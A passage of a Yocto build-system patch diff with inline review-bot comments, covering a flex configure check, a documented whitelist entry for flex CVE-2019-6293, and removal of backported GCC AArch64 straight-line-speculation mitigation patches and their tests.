++# reallocarray - OpenBSD function. We have replacement if not available.
++AC_CHECK_FUNCS([pow setlocale reallocarr reallocarray])
+
+ AC_CONFIG_FILES(
+ Makefile
+--
+2.25.1
+
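Review bot: The new optional list `AC_CHECK_FUNCS([pow setlocale reallocarr reallocarray])` probes for `reallocarr`, which the removed list did not, while the patch description says the change only moves `dnl` comments out of the macro argument. Presumably the extra probe came with the upstream commit being backported. If so, the description should say it, for example with a line such as `Also adds a check for reallocarr (NetBSD), as in the upstream commit.` before the `Upstream-Status` tag. Whether anything in the 2.6.4 sources reads the resulting `HAVE_REALLOCARR` is not visible from this hunk, so it is worth confirming that the define is inert here.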
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 43b2547fc6..50d3bf8de1 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -15,6 +15,8 @@ SRC_URI = "https://github.com/westes/flex/releases/download/v${PV}/flex-${PV}.ta
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
${@bb.utils.contains('PTEST_ENABLED', '1', '', 'file://disable-tests.patch', d)} \
file://0001-build-AC_USE_SYSTEM_EXTENSIONS-in-configure.ac.patch \
+ file://check-funcs.patch \
+ file://0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch \
"
SRC_URI[md5sum] = "2882e3179748cc9f9c23ec593d6adc8d"
@@ -24,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
+# Disputed - yes there is stack exhaustion but no bug and it is building the
+# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
inherit autotools gettext texinfo ptest
M4 = "${bindir}/m4"
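Review bot: The comment above `CVE_CHECK_WHITELIST += "CVE-2019-6293"` does not state the assumption that makes the exclusion acceptable, namely that flex is only run on grammar files the build already trusts. The entry presumably hides the CVE from cve-check reports wherever this recipe is built, target packages included, so that assumption should be written down for later re-evaluation. I would add a line such as `# Only reachable while generating a scanner from a .l file; assumes flex is never run on untrusted grammars.` The last comment sentence would also read more clearly as `# Upstream has no plans to address it:` followed by the issue link.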
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:58 +0100
-Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
- flags
-
-Here we introduce the flags that will be used for straight line speculation.
-
-The new flag introduced is `-mharden-sls=`.
-This flag can take arguments of `none`, `all`, or a comma seperated list
-of one or more of `retbr` or `blr`.
-`none` indicates no special mitigation of the straight line speculation
-vulnerability.
-`all` requests all mitigations currently implemented.
-`retbr` requests that the RET and BR instructions have a speculation
-barrier inserted after them.
-`blr` requests that BLR instructions are replaced by a BL to a function
-stub using a BR with a speculation barrier after it.
-
-Setting this on a per-function basis using attributes or the like is not
-enabled, but may be in the future.
-
-(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
-
-gcc/ChangeLog:
-
-2020-06-02 Matthew Malcomson <matthew.malcomson@arm.com>
-
- * config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
- New.
- (aarch64_harden_sls_blr_p): New.
- * config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
- New.
- (aarch64_harden_sls_retbr_p): New.
- (aarch64_harden_sls_blr_p): New.
- (aarch64_validate_sls_mitigation): New.
- (aarch64_override_options): Parse options for SLS mitigation.
- * config/aarch64/aarch64.opt (-mharden-sls): New option.
- * doc/invoke.texi: Document new option.
----
- gcc/config/aarch64/aarch64-protos.h | 3 ++
- gcc/config/aarch64/aarch64.c | 76 +++++++++++++++++++++++++++++
- gcc/config/aarch64/aarch64.opt | 4 ++
- gcc/doc/invoke.texi | 12 +++++
- 4 files changed, 95 insertions(+)
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index c083cad53..31493f412 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+extern bool aarch64_harden_sls_retbr_p (void);
-+extern bool aarch64_harden_sls_blr_p (void);
-+
- #endif /* GCC_AARCH64_PROTOS_H */
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index b452a53af..269ff6c92 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
- return false;
- }
-
-+/* Straight line speculation indicators. */
-+enum aarch64_sls_hardening_type
-+{
-+ SLS_NONE = 0,
-+ SLS_RETBR = 1,
-+ SLS_BLR = 2,
-+ SLS_ALL = 3,
-+};
-+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the RET
-+ and BR instructions. */
-+bool
-+aarch64_harden_sls_retbr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_RETBR;
-+}
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the BLR
-+ instruction. */
-+bool
-+aarch64_harden_sls_blr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_BLR;
-+}
-+
-+/* As of yet we only allow setting these options globally, in the future we may
-+ allow setting them per function. */
-+static void
-+aarch64_validate_sls_mitigation (const char *const_str)
-+{
-+ char *token_save = NULL;
-+ char *str = NULL;
-+
-+ if (strcmp (const_str, "none") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_NONE;
-+ return;
-+ }
-+ if (strcmp (const_str, "all") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_ALL;
-+ return;
-+ }
-+
-+ char *str_root = xstrdup (const_str);
-+ str = strtok_r (str_root, ",", &token_save);
-+ if (!str)
-+ error ("invalid argument given to %<-mharden-sls=%>");
-+
-+ int temp = SLS_NONE;
-+ while (str)
-+ {
-+ if (strcmp (str, "blr") == 0)
-+ temp |= SLS_BLR;
-+ else if (strcmp (str, "retbr") == 0)
-+ temp |= SLS_RETBR;
-+ else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
-+ {
-+ error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ else
-+ {
-+ error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ str = strtok_r (NULL, ",", &token_save);
-+ }
-+ aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
-+ free (str_root);
-+}
-+
- /* Parses CONST_STR for branch protection features specified in
- aarch64_branch_protect_types, and set any global variables required. Returns
- the parsing result and assigns LAST_STR to the last processed token from
-@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
- selected_arch = NULL;
- selected_tune = NULL;
-
-+ if (aarch64_harden_sls_string)
-+ aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
-+
- if (aarch64_branch_protection_string)
- aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
-
-diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
-index 3c6d1cc90..d27ab6df8 100644
---- a/gcc/config/aarch64/aarch64.opt
-+++ b/gcc/config/aarch64/aarch64.opt
-@@ -71,6 +71,10 @@ mgeneral-regs-only
- Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
- Generate code which uses only the general registers.
-
-+mharden-sls=
-+Target RejectNegative Joined Var(aarch64_harden_sls_string)
-+Generate code to mitigate against straight line speculation.
-+
- mfix-cortex-a53-835769
- Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
- Workaround for ARM Cortex-A53 Erratum number 835769.
-diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
-index 2f7ffe456..5f04a7d2b 100644
---- a/gcc/doc/invoke.texi
-+++ b/gcc/doc/invoke.texi
-@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
- -mpc-relative-literal-loads @gol
- -msign-return-address=@var{scope} @gol
- -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
-+-mharden-sls=@var{opts} @gol
- -march=@var{name} -mcpu=@var{name} -mtune=@var{name} @gol
- -moverride=@var{string} -mverbose-cost-dump @gol
- -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
-@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
- functions.
- @samp{bti} turns on branch target identification mechanism.
-
-+@item -mharden-sls=@var{opts}
-+@opindex mharden-sls
-+Enable compiler hardening against straight line speculation (SLS).
-+@var{opts} is a comma-separated list of the following options:
-+@table @samp
-+@item retbr
-+@item blr
-+@end table
-+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
-+@samp{-mharden-sls=none} disables all SLS hardening.
-+
- @item -msve-vector-bits=@var{bits}
- @opindex msve-vector-bits
- Specify the number of bits in an SVE vector register. This option only has
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
- instructions
-
-Instructions following RET or BR are not necessarily executed. In order
-to avoid speculation past RET and BR we can simply append a speculation
-barrier.
-
-Since these speculation barriers will not be architecturally executed,
-they are not expected to add a high performance penalty.
-
-The speculation barrier is to be SB when targeting architectures which
-have this enabled, and DSB SY + ISB otherwise.
-
-We add tests for each of the cases where such an instruction was seen.
-
-This is implemented by modifying each machine description pattern that
-emits either a RET or a BR instruction. We choose not to use something
-like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
-`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
-patterns and we find it preferable to implement the functionality in the
-same way for every pattern.
-
-There is one particular case which is slightly tricky. The
-implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
-to be mitigated against. The trampoline template is used *once* per
-compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
-builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
-In the future we may implement function specific attributes to turn on
-and off hardening on a per-function basis.
-The fixed nature of the trampoline described above implies it will be
-safer to ensure this speculation barrier is always used.
-
-Testing:
- Bootstrap and regtest done on aarch64-none-linux
- Used a temporary hack(1) to use these options on every test in the
- testsuite and a script to check that the output never emitted an
- unmitigated RET or BR.
-
-1) Temporary hack was a change to the testsuite to always use
-`-save-temps` and run a script on the assembly output of those
-compilations which produced one to ensure every RET or BR is immediately
-followed by a speculation barrier.
-
-(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
- * config/aarch64/aarch64.c (aarch64_output_casesi): Emit
- speculation barrier after BR instruction if needs be.
- (aarch64_trampoline_init): Handle ptr_mode value & adjust size
- of code copied.
- (aarch64_sls_barrier): New.
- (aarch64_asm_trampoline_template): Add needed barriers.
- * config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
- (TARGET_SB): New.
- (TRAMPOLINE_SIZE): Account for barrier.
- * config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
- simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
- Emit barrier if needs be, also account for possible barrier using
- "sls_length" attribute.
- (sls_length): New attribute.
- (length): Determine default using any non-default sls_length
- value.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
- New test.
- * gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
- * lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
- New proc.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 41 +++++-
- gcc/config/aarch64/aarch64.h | 10 +-
- gcc/config/aarch64/aarch64.md | 75 ++++++++---
- .../sls-mitigation/sls-miti-retbr-pacret.c | 15 +++
- .../aarch64/sls-mitigation/sls-miti-retbr.c | 119 ++++++++++++++++++
- .../aarch64/sls-mitigation/sls-mitigation.exp | 73 +++++++++++
- gcc/testsuite/lib/target-supports.exp | 3 +-
- 8 files changed, 312 insertions(+), 25 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 31493f412..885eae893 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+const char *aarch64_sls_barrier (int);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index 269ff6c92..dff61105c 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
- static void
- aarch64_asm_trampoline_template (FILE *f)
- {
-- int offset1 = 16;
-- int offset2 = 20;
-+ int offset1 = 24;
-+ int offset2 = 28;
-
- if (aarch64_bti_enabled ())
- {
-@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
- }
- asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
-
-+ /* We always emit a speculation barrier.
-+ This is because the same trampoline template is used for every nested
-+ function. Since nested functions are not particularly common or
-+ performant we don't worry too much about the extra instructions to copy
-+ around.
-+ This is not yet a problem, since we have not yet implemented function
-+ specific attributes to choose between hardening against straight line
-+ speculation or not, but such function specific attributes are likely to
-+ happen in the future. */
-+ asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
-+
- /* The trampoline needs an extra padding instruction. In case if BTI is
- enabled the padding instruction is replaced by the BTI instruction at
- the beginning. */
-@@ -8450,10 +8461,14 @@ static void
- aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
- {
- rtx fnaddr, mem, a_tramp;
-- const int tramp_code_sz = 16;
-+ const int tramp_code_sz = 24;
-
- /* Don't need to copy the trailing D-words, we fill those in below. */
-- emit_block_move (m_tramp, assemble_trampoline_template (),
-+ /* We create our own memory address in Pmode so that `emit_block_move` can
-+ use parts of the backend which expect Pmode addresses. */
-+ rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
-+ emit_block_move (gen_rtx_MEM (BLKmode, temp),
-+ assemble_trampoline_template (),
- GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
- mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
- fnaddr = XEXP (DECL_RTL (fndecl), 0);
-@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
- output_asm_insn (buf, operands);
- output_asm_insn (patterns[index][1], operands);
- output_asm_insn ("br\t%3", operands);
-+ output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
-+ operands);
- assemble_label (asm_out_file, label);
- return "";
- }
-@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
-
-+/* Helper function for straight line speculation.
-+ Return what barrier should be emitted for straight line speculation
-+ mitigation.
-+ When not mitigating against straight line speculation this function returns
-+ an empty string.
-+ When mitigating against straight line speculation, use:
-+ * SB when the v8.5-A SB extension is enabled.
-+ * DSB+ISB otherwise. */
-+const char *
-+aarch64_sls_barrier (int mitigation_required)
-+{
-+ return mitigation_required
-+ ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
-+ : "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 772a97296..72ddc6fd9 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
- #define AARCH64_ISA_F16FML (aarch64_isa_flags & AARCH64_FL_F16FML)
- #define AARCH64_ISA_RCPC8_4 (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
- #define AARCH64_ISA_V8_5 (aarch64_isa_flags & AARCH64_FL_V8_5)
-+#define AARCH64_ISA_SB (aarch64_isa_flags & AARCH64_FL_SB)
-
- /* Crypto is an optional extension to AdvSIMD. */
- #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
-@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
- #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
- #endif
-
-+/* SB instruction is enabled through +sb. */
-+#define TARGET_SB (AARCH64_ISA_SB)
-+
- /* Apply the workaround for Cortex-A53 erratum 835769. */
- #define TARGET_FIX_ERR_A53_835769 \
- ((aarch64_fix_a53_err835769 == 2) \
-@@ -931,8 +935,10 @@ typedef struct
-
- #define RETURN_ADDR_RTX aarch64_return_addr
-
--/* BTI c + 3 insns + 2 pointer-sized entries. */
--#define TRAMPOLINE_SIZE (TARGET_ILP32 ? 24 : 32)
-+/* BTI c + 3 insns
-+ + sls barrier of DSB + ISB.
-+ + 2 pointer-sized entries. */
-+#define TRAMPOLINE_SIZE (24 + (TARGET_ILP32 ? 8 : 16))
-
- /* Trampolines contain dwords, so must be dword aligned. */
- #define TRAMPOLINE_ALIGNMENT 64
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index cc5a887d4..494aee964 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -331,10 +331,25 @@
- ;; Attribute that specifies whether the alternative uses MOVPRFX.
- (define_attr "movprfx" "no,yes" (const_string "no"))
-
-+;; Attribute to specify that an alternative has the length of a single
-+;; instruction plus a speculation barrier.
-+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
-+
- (define_attr "length" ""
- (cond [(eq_attr "movprfx" "yes")
- (const_int 8)
-- ] (const_int 4)))
-+
-+ (eq_attr "sls_length" "retbr")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
-+ (match_test "TARGET_SB") (const_int 8)]
-+ (const_int 12))
-+
-+ (eq_attr "sls_length" "casesi")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
-+ (match_test "TARGET_SB") (const_int 20)]
-+ (const_int 24))
-+ ]
-+ (const_int 4)))
-
- ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
- ;; no predicated insns.
-@@ -370,8 +385,12 @@
- (define_insn "indirect_jump"
- [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
- ""
-- "br\\t%0"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "jump"
-@@ -657,7 +676,7 @@
- "*
- return aarch64_output_casesi (operands);
- "
-- [(set_attr "length" "16")
-+ [(set_attr "sls_length" "casesi")
- (set_attr "type" "branch")]
- )
-
-@@ -736,14 +755,18 @@
- [(return)]
- ""
- {
-+ const char *ret = NULL;
- if (aarch64_return_address_signing_enabled ()
- && TARGET_ARMV8_3
- && !crtl->calls_eh_return)
-- return "retaa";
--
-- return "ret";
-+ ret = "retaa";
-+ else
-+ ret = "ret";
-+ output_asm_insn (ret, operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
- }
-- [(set_attr "type" "branch")]
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_expand "return"
-@@ -755,8 +778,12 @@
- (define_insn "simple_return"
- [(simple_return)]
- "aarch64_use_simple_return_insn_p ()"
-- "ret"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("ret", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "*cb<optab><mode>1"
-@@ -947,10 +974,16 @@
- (match_operand 1 "" ""))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%0
-- b\\t%c0"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c0";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- (define_insn "*sibcall_value_insn"
-@@ -960,10 +993,16 @@
- (match_operand 2 "" "")))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%1
-- b\\t%c1"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%1", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c1";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- ;; Call subroutine returning any type.
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-new file mode 100644
-index 000000000..7656123ee
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-@@ -0,0 +1,15 @@
-+/* Avoid ILP32 since pacret is only available for LP64 */
-+/* { dg-do compile { target { ! ilp32 } } } */
-+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
-+
-+/* Testing the do_return pattern for retaa. */
-+long retbr_subcall(void);
-+long retbr_do_return_retaa(void)
-+{
-+ return retbr_subcall()+1;
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
-+/* { dg-final { scan-assembler-not {ret\t} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-new file mode 100644
-index 000000000..573b30cdc
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-@@ -0,0 +1,119 @@
-+/* We ensure that -Wpedantic is off since it complains about the trampolines
-+ we explicitly want to test. */
-+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
-+/*
-+ Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
-+ instructions.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+int
-+retbr_sibcall_value_insn (struct sls_testclass x)
-+{
-+ return x.x(x.left, x.right);
-+}
-+
-+void
-+retbr_sibcall_insn (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+}
-+
-+/* Aim to test two different returns.
-+ One that introduces a tail call in the middle of the function, and one that
-+ has a normal return. */
-+int
-+retbr_multiple_returns (struct sls_testclass x)
-+{
-+ int temp;
-+ if (x.left % 10)
-+ return x.x(x.left, 100);
-+ else if (x.right % 20)
-+ {
-+ return x.x(x.left * x.right, 100);
-+ }
-+ temp = x.left % x.right;
-+ temp *= 100;
-+ temp /= 2;
-+ return temp % 3;
-+}
-+
-+void
-+retbr_multiple_returns_void (struct sls_testclass x)
-+{
-+ if (x.left % 10)
-+ {
-+ x.y(x.left, 100);
-+ }
-+ else if (x.right % 20)
-+ {
-+ x.y(x.left * x.right, 100);
-+ }
-+ return;
-+}
-+
-+/* Testing the casesi jump via register. */
-+__attribute__ ((optimize ("Os")))
-+int
-+retbr_casesi_dispatch (struct sls_testclass x)
-+{
-+ switch (x.left)
-+ {
-+ case -5:
-+ return -2;
-+ case -3:
-+ return -1;
-+ case 0:
-+ return 0;
-+ case 3:
-+ return 1;
-+ case 5:
-+ break;
-+ default:
-+ __builtin_unreachable ();
-+ }
-+ return x.right;
-+}
-+
-+/* Testing the BR in trampolines is mitigated against. */
-+void f1 (void *);
-+void f3 (void *, void (*)(void *));
-+void f2 (void *);
-+
-+int
-+retbr_trampolines (void *a, int b)
-+{
-+ if (!b)
-+ {
-+ f1 (a);
-+ return 1;
-+ }
-+ if (b)
-+ {
-+ void retbr_tramp_internal (void *c)
-+ {
-+ if (c == a)
-+ f2 (c);
-+ }
-+ f3 (a, retbr_tramp_internal);
-+ }
-+ return 0;
-+}
-+
-+/* Testing the indirect_jump pattern. */
-+void
-+retbr_indirect_jump (int *buf)
-+{
-+ __builtin_longjmp(buf, 1);
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-new file mode 100644
-index 000000000..812250379
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-@@ -0,0 +1,73 @@
-+# Regression driver for SLS mitigation on AArch64.
-+# Copyright (C) 2020 Free Software Foundation, Inc.
-+# Contributed by ARM Ltd.
-+#
-+# This file is part of GCC.
-+#
-+# GCC is free software; you can redistribute it and/or modify it
-+# under the terms of the GNU General Public License as published by
-+# the Free Software Foundation; either version 3, or (at your option)
-+# any later version.
-+#
-+# GCC is distributed in the hope that it will be useful, but
-+# WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-+# General Public License for more details.
-+#
-+# You should have received a copy of the GNU General Public License
-+# along with GCC; see the file COPYING3. If not see
-+# <http://www.gnu.org/licenses/>. */
-+
-+# Exit immediately if this isn't an AArch64 target.
-+if {![istarget aarch64*-*-*] } then {
-+ return
-+}
-+
-+# Load support procs.
-+load_lib gcc-dg.exp
-+load_lib torture-options.exp
-+
-+# If a testcase doesn't have special options, use these.
-+global DEFAULT_CFLAGS
-+if ![info exists DEFAULT_CFLAGS] then {
-+ set DEFAULT_CFLAGS " "
-+}
-+
-+# Initialize `dg'.
-+dg-init
-+torture-init
-+
-+# Use different architectures as well as the normal optimisation options.
-+# (i.e. use both SB and DSB+ISB barriers).
-+
-+set save-dg-do-what-default ${dg-do-what-default}
-+# Main loop.
-+# Run with torture tests (i.e. a bunch of different optimisation levels) just
-+# to increase test coverage.
-+set dg-do-what-default assemble
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+
-+# Run the same tests but this time with SB extension.
-+# Since not all supported assemblers will support that extension we decide
-+# whether to assemble or just compile based on whether the extension is
-+# supported for the available assembler.
-+
-+set templist {}
-+foreach x $DG_TORTURE_OPTIONS {
-+ lappend templist "$x -march=armv8.3-a+sb "
-+ lappend templist "$x -march=armv8-a+sb "
-+}
-+set-torture-options $templist
